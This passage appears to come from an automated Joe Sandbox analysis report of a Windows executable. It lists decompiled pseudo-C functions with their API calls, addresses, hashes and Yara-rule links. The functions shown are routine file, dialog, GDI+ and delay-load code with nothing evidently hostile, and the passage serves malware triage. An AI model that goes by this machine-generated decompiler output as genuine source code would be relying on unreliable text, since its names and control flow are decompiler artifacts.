                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 84f759744d688a4324340e0ead2b610c75cb6b339fd39d206d12ce652cfe3f20
                • Instruction ID: e5cf939b3ef8cc3b22110de3e2fa202b5b4dc4b4c7d680f6306174ffbad8c6d2
                • Opcode Fuzzy Hash: 84f759744d688a4324340e0ead2b610c75cb6b339fd39d206d12ce652cfe3f20
                • Instruction Fuzzy Hash: 6DE06D3560622D67EA7B2B659D05BBF7A4C9F617A4F160121AE18AA191CF60CC0082E5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E003D5ABD(intOrPtr __ecx, void* __eflags) {
				void* _t36;

				E003EEB78(0x402739, _t36);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E003DB505(__ecx); // executed
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E003E0637();
				 *(_t36 - 4) = 1;
				E003E0637();
				 *(_t36 - 4) = 2;
				E003E0637();
				 *(_t36 - 4) = 3;
				E003E0637();
				 *(_t36 - 4) = 4;
				E003E0637();
				 *(_t36 - 4) = 5;
				E003D5CAC(__ecx,  *(_t36 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return __ecx;
			}




                0x003d5ac2
                0x003d5ac7
                0x003d5acb
                0x003d5ace
                0x003d5ad3
                0x003d5add
                0x003d5ae8
                0x003d5aec
                0x003d5af7
                0x003d5afb
                0x003d5b06
                0x003d5b0a
                0x003d5b15
                0x003d5b19
                0x003d5b20
                0x003d5b24
                0x003d5b2f
                0x003d5b37

                APIs
                • __EH_prolog.LIBCMT ref: 003D5AC2
                  • Part of subcall function 003DB505: __EH_prolog.LIBCMT ref: 003DB50A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6aacdabfb83dc8ecaec08ad0562e0c8e5f4c6fdf56aa9d57efa7e6aacde37fd1
                • Instruction ID: 9dc4e522bcee0e5e9564c8b288c5dc0c6c18311b9c9f02f1e414f2ed1270171c
                • Opcode Fuzzy Hash: 6aacdabfb83dc8ecaec08ad0562e0c8e5f4c6fdf56aa9d57efa7e6aacde37fd1
                • Instruction Fuzzy Hash: 860181304106E0DAD71AE7B8D0457DDF7A4DF94304F50858EA4565B2C2CBF82B08D7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E003D9620(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 8) != 0xffffffff) {
					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
				}
				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
					E003D6BD5(0x411098, _t21 + 0x32);
				}
				return _t16;
			}





                0x003d9622
                0x003d9624
                0x003d962a
                0x003d9630
                0x003d9641
                0x003d9646
                0x003d9648
                0x003d9648
                0x003d964a
                0x003d964a
                0x003d964e
                0x003d9654
                0x003d9664
                0x003d9664
                0x003d966d

                APIs
                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003D95D6,?,?,?,?,?,00402641,000000FF), ref: 003D963B
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 9d5b9660f98ec1c4d44c7f6a8e74641f8996b04954a8b4a17e853402dfb168fe
                • Instruction ID: 4382d0e103fb8c79351f55690db18b7619ab374262d0bfeab20981cb8a367751
                • Opcode Fuzzy Hash: 9d5b9660f98ec1c4d44c7f6a8e74641f8996b04954a8b4a17e853402dfb168fe
                • Instruction Fuzzy Hash: 6AF08972485B15DFDB328A34D45879277E86B12331F045B5FD0F742AE0D771A98D8B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DA56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				void* _t13;
				intOrPtr _t19;

				_t19 = _a8;
				 *((char*)(_t19 + 0x1044)) = 0;
				if(E003DBDB4(_a4) != 0) {
					L3:
					return 0;
				}
				_t13 = E003DA69B(0xffffffff, _a4, _t19); // executed
				if(_t13 == 0xffffffff) {
					goto L3;
				}
				FindClose(_t13); // executed
				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
				 *((char*)(_t19 + 0x100c)) = E003DA28F( *((intOrPtr*)(_t19 + 0x1008)));
				 *((char*)(_t19 + 0x100d)) = E003DA2A6( *((intOrPtr*)(_t19 + 0x1008)));
				return 1;
			}





                0x003da56e
                0x003da576
                0x003da584
                0x003da5cb
                0x00000000
                0x003da5cb
                0x003da58d
                0x003da595
                0x00000000
                0x00000000
                0x003da598
                0x003da5a4
                0x003da5b6
                0x003da5c1
                0x00000000

                APIs
                  • Part of subcall function 003DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6C4
                  • Part of subcall function 003DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6F2
                  • Part of subcall function 003DA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6FE
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003DA598
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Find$FileFirst$CloseErrorLast
                • String ID:
                • API String ID: 1464966427-0
                • Opcode ID: 7d06435e11f0708e8aece1b4877c40945ca4d0f868352067cbbcb1de567ab22e
                • Instruction ID: 9a4a8391a8f01f344778f397bec3801479fcc9306f6bd1f771a5a1995685f682
                • Opcode Fuzzy Hash: 7d06435e11f0708e8aece1b4877c40945ca4d0f868352067cbbcb1de567ab22e
                • Instruction Fuzzy Hash: D2F08933009B90EACF235BB46A047C7BB956F16331F058E4BF1FD56296C27550989B23
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E003E0E08() {
				void* __esi;
				void* _t2;

				L003E1B58(); // executed
				_t2 = E003E1B5D();
				if(_t2 != 0) {
					_t2 = E003D6C31(_t2, 0x411098, 0xff, 0xff);
				}
				if( *0x4110a4 != 0) {
					_t2 = E003D6C31(_t2, 0x411098, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                0x003e0e0a
                0x003e0e0f
                0x003e0e20
                0x003e0e25
                0x003e0e25
                0x003e0e31
                0x003e0e36
                0x003e0e36
                0x003e0e3d
                0x003e0e45

                APIs
                • SetThreadExecutionState.KERNEL32 ref: 003E0E3D
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 3e8ceac23f81f0b2f1f16aa09c6682fbc01ff338720164bc4f8cd7c823d46b60
                • Instruction ID: 18298d18d12e474fb6cb78a5f92b7d5102dc621b4b4bf5d67da013d9119b766e
                • Opcode Fuzzy Hash: 3e8ceac23f81f0b2f1f16aa09c6682fbc01ff338720164bc4f8cd7c823d46b60
                • Instruction Fuzzy Hash: FBD0C221E110E556DE17332A38567FE290A8FCB311F0E0137B2496F6D6CBA808C2A261
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E003EA626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L003EEB02();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E003EA3B9(__eax, _a4, _a8); // executed
				return _t6;
			}





                0x003ea629
                0x003ea62a
                0x003ea62c
                0x003ea631
                0x003ea636
                0x00000000
                0x003ea647
                0x003ea640
                0x00000000

                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 003EA62C
                  • Part of subcall function 003EA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003EA3DA
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                • Instruction ID: dd60b7d847162f8f4f8cc1dfec2bd83c027384ae1be486e2aab488ca67a8356d
                • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                • Instruction Fuzzy Hash: A9D0C971214659BADF436B638C12A6E7A9AFB01340F048225B842D92D1EAB1ED10A662
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EDD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0x418458, 0x6a, 0x402, E003E0264(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E003EB568(); // executed
				return _t7;
			}




                0x003edd92
                0x003edd98
                0x003edd9d

                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,003E1B3E), ref: 003EDD92
                  • Part of subcall function 003EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                  • Part of subcall function 003EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                  • Part of subcall function 003EB568: IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                  • Part of subcall function 003EB568: TranslateMessage.USER32(?), ref: 003EB5AC
                  • Part of subcall function 003EB568: DispatchMessageW.USER32(?), ref: 003EB5B6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 815dc13cf624ed726b74e83499c88c5faede7d98870ff7d90a5c7549a22b5a41
                • Instruction ID: 8fa33a80568ea5dfbe1ebed6439c99046e90185a02bac65646bddbd110a808db
                • Opcode Fuzzy Hash: 815dc13cf624ed726b74e83499c88c5faede7d98870ff7d90a5c7549a22b5a41
                • Instruction Fuzzy Hash: 0AD0C731144340BAEA032B52DD06F0F7AE2FB88B05F004A54B384740F1CAB29D71DF15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 50%
                			E003EE5BB(void* __esi) {
				void* _t2;
				intOrPtr _t5;
				void* _t6;
				void* _t11;

				_t11 = __esi;
				if(( *0x405650 & 0x00001000) == 0) {
					return _t2;
				} else {
					E003EE664();
					_t5 =  *0x431ce8 + 1;
					 *0x431ce8 = _t5;
					if(_t5 == 1) {
						E003EE78D(4, 0x431cec); // executed
					}
					_t6 = E003EE5EE();
					if(_t6 == 0) {
						 *0x431ce4 = 0;
						return _t6;
					} else {
						 *0x403278(0x431ce4, _t11);
						return  *((intOrPtr*)( *0x431ce0))();
					}
				}
			}







                0x003ee5bb
                0x003ee5c5
                0x003ee5ed
                0x003ee5c7
                0x003ee5c7
                0x003ee5d1
                0x003ee5d2
                0x003ee5da
                0x003ee5e3
                0x003ee5e3
                0x003ee831
                0x003ee838
                0x003ee852
                0x003ee85c
                0x003ee83a
                0x003ee848
                0x003ee851
                0x003ee851
                0x003ee838

                APIs
                • DloadProtectSection.DELAYIMP ref: 003EE5E3
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DloadProtectSection
                • String ID:
                • API String ID: 2203082970-0
                • Opcode ID: 7ae5606352c5654ee8558f0e213ff3e5cab150acb03443d8f41b0dfa40367359
                • Instruction ID: 75986362c5b5abf55392c3055f893b183cecc1bd0b2d4b28c330a3a064dfd6b7
                • Opcode Fuzzy Hash: 7ae5606352c5654ee8558f0e213ff3e5cab150acb03443d8f41b0dfa40367359
                • Instruction Fuzzy Hash: 6DD012B01C02F09BD703FBAA99C67553354B325B06F903721F149D54F1DB748480CA2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003D98BC(void* __ecx) {
				long _t3;

				if( *(__ecx + 8) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 8)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}




                0x003d98c0
                0x003d98c8
                0x003d98d1
                0x003d98da
                0x00000000
                0x00000000
                0x00000000
                0x003d98c2
                0x003d98c2
                0x003d98c4
                0x003d98c4

                APIs
                • GetFileType.KERNELBASE(000000FF,003D97BE), ref: 003D98C8
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 65af6827cbafee5e85836c6f0503860753c931575008e1d3f406773c00a860f4
                • Instruction ID: 6067307e23907299f49ea03685d94109a2365295556d6a66d0c57301831ab156
                • Opcode Fuzzy Hash: 65af6827cbafee5e85836c6f0503860753c931575008e1d3f406773c00a860f4
                • Instruction Fuzzy Hash: D2C0123640010585CE224A24A8441957751AA537667B98697D028851A1C332CC47FB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EEAE7() {

				E003EE85D(0x40c6cc, 0x433034); // executed
				goto __eax;
			}



                0x003eeaf9
                0x003eeb00

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EEAF9
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 56ba7ee68d38b272388920e1ef233ba76de1597ae02394c79ab0164b753154a6
                • Instruction ID: 341ac6f47037c92400d010f80de4dd209669c68fa10c639ffe9eb7550b85ba14
                • Opcode Fuzzy Hash: 56ba7ee68d38b272388920e1ef233ba76de1597ae02394c79ab0164b753154a6
                • Instruction Fuzzy Hash: D4B012C62AA0E2BC750963021D82C3B011CC4C0FA1330D73FF414E84C1DD854C450435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE423() {

				E003EE85D(0x40c60c, 0x43304c); // executed
				goto __eax;
			}



                0x003ee3fc
                0x003ee403

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6d9e6ada0cfb6a9e14ee9b3769cab5dc92e228e2ed02a25c2822abec0481f9b6
                • Instruction ID: e26fa9a003e30c76ebd97d3eb16bba2e7b6628c7496f63c537491548f1bc848b
                • Opcode Fuzzy Hash: 6d9e6ada0cfb6a9e14ee9b3769cab5dc92e228e2ed02a25c2822abec0481f9b6
                • Instruction Fuzzy Hash: 1AB012F52580A0FC711992061C02D37021CC0C4F11330D73FF814E54C1D9484E040837
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE419() {

				E003EE85D(0x40c60c, 0x433054); // executed
				goto __eax;
			}



                0x003ee3fc
                0x003ee403

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: cc1ce3aaf29e1655de741b1b3faa176f775d6d080986114b32695173a5929ee1
                • Instruction ID: 3333054c4bd036a971803949168cef12f8873bd379464b8541d8ef18c6692532
                • Opcode Fuzzy Hash: cc1ce3aaf29e1655de741b1b3faa176f775d6d080986114b32695173a5929ee1
                • Instruction Fuzzy Hash: 3AB012E525C0A0BC711952071D02D77021CC0C5F11330D73FF514E54C0D9450C4D0837
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE44B() {

				E003EE85D(0x40c60c, 0x43305c); // executed
				goto __eax;
			}



                0x003ee3fc
                0x003ee403

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE3FC
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 82a2dac04354a370892edda9663ff24b15f08def99809cc1c59ee805dd65d64b
                • Instruction ID: 8fc20724bfe88064231d70cacaf5b99800fae6593dc4b8042f2315e44b3d604d
                • Opcode Fuzzy Hash: 82a2dac04354a370892edda9663ff24b15f08def99809cc1c59ee805dd65d64b
                • Instruction Fuzzy Hash: 9CB012E525C0A0FC711992061C02D37021CC0C5F11330D73FF814E54C0D9444C0C0837
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE5B1() {

